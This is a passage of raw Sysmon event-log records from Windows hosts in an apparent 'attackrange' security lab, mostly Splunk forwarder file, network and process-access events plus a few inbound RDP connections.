Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976804Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.172{69CF5F33-88A5-6151-8679-00000000FD01}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976823Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:30.749{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A4783B1985C399B425A2447F1568A59,SHA256=1BA1D79A2725BA277C7FB11C91D97AE251851253E8018DFE4C15707B8940DEAB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976822Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:26.847{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59271-false10.0.1.12-8000- 23542300x8000000000000000976821Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:30.233{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6717F145ACF0D7855AF7D92558A9F2D5,SHA256=4EF46DB26EEB9897B09C1238E63D9D6094E3449C41CCC91EB4552FFE014FB458,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048208Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:30.385{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F0E0A01136F45B9E4BEA4CD381C430E,SHA256=008C53F48E97E33475E1E2557FACD75E58CE9488C4EC81822D61FA53661D6738,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048207Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:27.759{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49235-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048209Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:31.407{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCA2C74210E864C6911CF60F01D651B7,SHA256=437E56AE698695FBA5F9260AA706FB73F626F3C6A2D853660C97E141E21C2C39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976824Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:31.249{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=254091AE2676761E7C2B77EDCAF72887,SHA256=D331E0805D0BACD6A10CD71A49927E6310B953386C268ECBEDEA86A87B25CC32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048210Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:32.407{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0EAF7BB114A833DD295BA73E0470EC6,SHA256=8539E43AFEFFE7B666D231C316EE481B3DC5364EF7EB8731724F067E131604D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976828Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:29.396{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de55054-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976827Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:32.468{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CA7CF0EC1237B45A3368AC5523E5E664,SHA256=E2A97408C9B246EEC2A0A9B16F4AFFF6694AA8025B83E0B3D5F84037D6D4687D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976826Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:32.343{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABC4221673ACCA769505FFBD787F1F7C,SHA256=901331EA8F784B73160C37EBFAEEFE6C5E06F1B9E9072DF5A7D49AA1D7F918E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976825Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:32.015{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10CCE4004D16A5B48B93B02FD876409C,SHA256=433E985AB3652B65C9F67604524E8DBB4944540DBF524B765368B90F6DA014A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048211Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:33.438{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2914E28AE00F26234B14DE0CC507F1DB,SHA256=D78F2D0B1481D7F8E4410D017D2EF67AF354E3E9D24BC4B5DB4032F456212B77,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976830Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:30.750{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-24005-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976829Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:33.390{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B58A164B2F5F73343AD3DACD977E466,SHA256=5A2C6BC879791BD24957AEE237157D4D8A5A645E7147CD2D1414E2ED6D0E9282,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048212Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:34.452{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=340C0BC1079397BB5D3573F0DADAC2BD,SHA256=B5B43F3D765DDD5DD56187CBA7BAE73297312793C75369F387917DEDF33598D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976831Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:34.421{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=016724FDCEDD9EFE9D3A4B356F6B039F,SHA256=73C3E95691A01B5D718AF78ADD38CA9EADFA559BD4A57529D6CC5F27684064A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976834Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:32.815{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59272-false10.0.1.12-8000- 23542300x8000000000000000976833Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:35.593{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=867281B8875542AC7498CC1EB18E51D4,SHA256=8AB59187033E28D6338B19E51389E342209E364778E88B676A7D79C97D6C1247,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976832Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:35.593{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6030191F126017D1C99B3B9895CF483E,SHA256=4B5AFBF1463D2B8832674D4CE648D49C4A43DC2E7BE790F8A7EB8A8725475DB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048214Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:35.468{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA71381E91C5629628324397047FB6CD,SHA256=A39D893DCB1E81D8393A10066E15E2CC2B7BD815459525D76F5C55AF7C8A5F6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048213Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:32.913{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49236-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000976835Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:36.718{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35A6922B79A456248C18574010F8F893,SHA256=44770DD0D75AC17FFAD00CF841C5A483C358ECFC56D7A12A4DD73E2211913C00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048216Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:36.590{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4BA82CCA7A1280BBB18068A7FDEFB29,SHA256=70549CC59DF6B087E656ADDB937213F733E73B00FFE7F537BA6473716BD25085,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048215Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:36.424{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048219Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:37.755{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=153C20CAFFC0CECFC5EE4955114A2625,SHA256=509AED921EAD0E75BBFABD606F1BEBE22825ED0CB111DB840A30738C14860307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048218Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:37.755{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4473CE2AD6A116006763E55BE3387850,SHA256=E33DE66A8A12B0CE51FB1C9D369D11025B8961244600B8530C22E9D165670403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048217Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:37.623{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87384BF350ADDD1F6DD11264D6DF7138,SHA256=C1021444F5C4DF6F9EF9B97BD1E13551E0F9E2C34C8E7F1CEFD98753F968995D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976849Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88AD-6151-8779-00000000FD01}876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976848Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976847Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976846Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976845Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976844Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976843Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976842Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976841Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976840Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976839Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-88AD-6151-8779-00000000FD01}876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976838Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.749{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88AD-6151-8779-00000000FD01}876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 